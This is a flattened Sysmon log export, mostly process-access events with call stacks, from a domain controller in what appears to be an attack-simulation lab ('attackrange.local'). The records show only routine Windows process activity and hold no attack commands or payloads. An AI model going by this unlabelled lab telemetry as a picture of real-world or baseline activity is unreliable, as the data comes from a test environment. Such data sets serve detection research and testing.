12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-64C1-6064-9200-00000000AE01}25524384C:\Windows\system32\winlogon.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.714{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{266CAFBE-64C1-6064-9FF5-090000000000}0x9f59f2SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1b160|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
